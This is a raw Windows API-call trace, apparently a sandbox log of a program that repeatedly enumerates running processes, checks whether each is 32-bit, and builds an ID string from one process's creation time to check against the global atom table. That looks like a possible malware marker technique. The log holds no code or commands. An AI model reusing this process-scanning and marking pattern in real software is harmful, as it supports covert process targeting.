	[0077.500] CloseHandle (hObject=0x224) returned 1
	[0077.500] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0077.500] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.500] CloseHandle (hObject=0x224) returned 1
	[0077.500] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0077.500] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.500] CloseHandle (hObject=0x224) returned 1
	[0077.501] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0077.501] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.501] CloseHandle (hObject=0x224) returned 1
	[0077.501] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0077.501] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.501] CloseHandle (hObject=0x224) returned 1
	[0077.501] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0077.501] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0077.501] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0077.501] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0077.501] wsprintfA (in: param_1=0x710e08, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0077.501] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0077.502] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0077.502] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0077.502] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0077.502] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0077.502] CloseHandle (hObject=0x224) returned 1
	[0077.502] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0077.502] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0077.502] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.502] CloseHandle (hObject=0x224) returned 1
	[0077.502] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0077.502] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0077.502] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.502] CloseHandle (hObject=0x224) returned 1
	[0077.575] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0077.575] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0077.575] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0077.575] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0077.575] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0077.575] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0077.575] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0077.576] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0077.576] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0077.576] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0077.576] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0077.576] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0077.576] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0077.576] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0077.576] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0077.576] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0077.576] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0077.576] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0077.577] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0077.577] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.577] CloseHandle (hObject=0x224) returned 1
	[0077.577] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0077.577] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0077.577] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0077.577] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.577] CloseHandle (hObject=0x224) returned 1
	[0077.577] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0077.577] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0077.577] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.577] CloseHandle (hObject=0x224) returned 1
	[0077.577] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0077.577] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.577] CloseHandle (hObject=0x224) returned 1
	[0077.577] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0077.577] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.577] CloseHandle (hObject=0x224) returned 1
	[0077.578] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0077.578] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.578] CloseHandle (hObject=0x224) returned 1
	[0077.578] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0077.578] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.578] CloseHandle (hObject=0x224) returned 1
	[0077.578] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0077.578] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.578] CloseHandle (hObject=0x224) returned 1
	[0077.578] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0077.578] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0077.578] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.578] CloseHandle (hObject=0x224) returned 1
	[0077.578] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0077.578] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.578] CloseHandle (hObject=0x224) returned 1
	[0077.578] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0077.578] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.578] CloseHandle (hObject=0x224) returned 1
	[0077.578] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0077.578] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0077.578] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.579] CloseHandle (hObject=0x224) returned 1
	[0077.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0077.579] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.579] CloseHandle (hObject=0x224) returned 1
	[0077.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0077.579] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.579] CloseHandle (hObject=0x224) returned 1
	[0077.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0077.579] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.579] CloseHandle (hObject=0x224) returned 1
	[0077.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0077.579] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.579] CloseHandle (hObject=0x224) returned 1
	[0077.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0077.579] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.579] CloseHandle (hObject=0x224) returned 1
	[0077.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0077.579] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.579] CloseHandle (hObject=0x224) returned 1
	[0077.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0077.579] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.579] CloseHandle (hObject=0x224) returned 1
	[0077.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0077.580] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.580] CloseHandle (hObject=0x224) returned 1
	[0077.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0077.580] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.580] CloseHandle (hObject=0x224) returned 1
	[0077.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0077.580] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.580] CloseHandle (hObject=0x224) returned 1
	[0077.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0077.580] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.580] CloseHandle (hObject=0x224) returned 1
	[0077.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0077.580] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.580] CloseHandle (hObject=0x224) returned 1
	[0077.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0077.580] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.580] CloseHandle (hObject=0x224) returned 1
	[0077.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0077.580] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.580] CloseHandle (hObject=0x224) returned 1
	[0077.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0077.581] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.581] CloseHandle (hObject=0x224) returned 1
	[0077.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0077.581] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.581] CloseHandle (hObject=0x224) returned 1
	[0077.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0077.581] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.581] CloseHandle (hObject=0x224) returned 1
	[0077.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0077.581] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.581] CloseHandle (hObject=0x224) returned 1
	[0077.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0077.581] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.581] CloseHandle (hObject=0x224) returned 1
	[0077.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0077.581] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0077.582] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0077.582] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0077.582] wsprintfA (in: param_1=0x710e08, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0077.582] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0077.582] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0077.582] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0077.582] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0077.582] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0077.582] CloseHandle (hObject=0x224) returned 1
	[0077.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0077.583] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0077.583] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.583] CloseHandle (hObject=0x224) returned 1
	[0077.583] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0077.583] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0077.583] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.583] CloseHandle (hObject=0x224) returned 1
	[0077.667] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0077.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0077.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0077.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0077.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0077.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0077.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0077.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0077.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0077.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0077.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0077.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0077.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0077.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0077.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0077.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0077.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0077.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0077.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0077.669] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.669] CloseHandle (hObject=0x224) returned 1
	[0077.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0077.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0077.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0077.669] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.669] CloseHandle (hObject=0x224) returned 1
	[0077.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0077.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0077.670] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.670] CloseHandle (hObject=0x224) returned 1
	[0077.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0077.670] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.670] CloseHandle (hObject=0x224) returned 1
	[0077.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0077.670] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.670] CloseHandle (hObject=0x224) returned 1
	[0077.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0077.670] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.670] CloseHandle (hObject=0x224) returned 1
	[0077.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0077.670] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.670] CloseHandle (hObject=0x224) returned 1
	[0077.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0077.670] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.670] CloseHandle (hObject=0x224) returned 1
	[0077.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0077.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0077.671] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.671] CloseHandle (hObject=0x224) returned 1
	[0077.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0077.671] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.671] CloseHandle (hObject=0x224) returned 1
	[0077.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0077.671] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.671] CloseHandle (hObject=0x224) returned 1
	[0077.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0077.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0077.671] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.671] CloseHandle (hObject=0x224) returned 1
	[0077.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0077.671] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.671] CloseHandle (hObject=0x224) returned 1
	[0077.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0077.671] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.672] CloseHandle (hObject=0x224) returned 1
	[0077.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0077.672] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.672] CloseHandle (hObject=0x224) returned 1
	[0077.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0077.672] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.672] CloseHandle (hObject=0x224) returned 1
	[0077.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0077.672] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.672] CloseHandle (hObject=0x224) returned 1
	[0077.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0077.672] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.672] CloseHandle (hObject=0x224) returned 1
	[0077.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0077.672] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.672] CloseHandle (hObject=0x224) returned 1
	[0077.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0077.672] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.672] CloseHandle (hObject=0x224) returned 1
	[0077.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0077.673] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.673] CloseHandle (hObject=0x224) returned 1
	[0077.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0077.673] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.673] CloseHandle (hObject=0x224) returned 1
	[0077.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0077.673] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.673] CloseHandle (hObject=0x224) returned 1
	[0077.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0077.673] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.673] CloseHandle (hObject=0x224) returned 1
	[0077.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0077.673] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.673] CloseHandle (hObject=0x224) returned 1
	[0077.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0077.673] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.673] CloseHandle (hObject=0x224) returned 1
	[0077.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0077.673] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.674] CloseHandle (hObject=0x224) returned 1
	[0077.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0077.674] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.674] CloseHandle (hObject=0x224) returned 1
	[0077.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0077.674] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.674] CloseHandle (hObject=0x224) returned 1
	[0077.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0077.674] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.674] CloseHandle (hObject=0x224) returned 1
	[0077.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0077.674] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.674] CloseHandle (hObject=0x224) returned 1
	[0077.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0077.674] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0077.675] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0077.675] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0077.675] wsprintfA (in: param_1=0x710e08, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0077.675] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0077.675] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0077.675] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0077.675] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0077.675] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0077.675] CloseHandle (hObject=0x224) returned 1
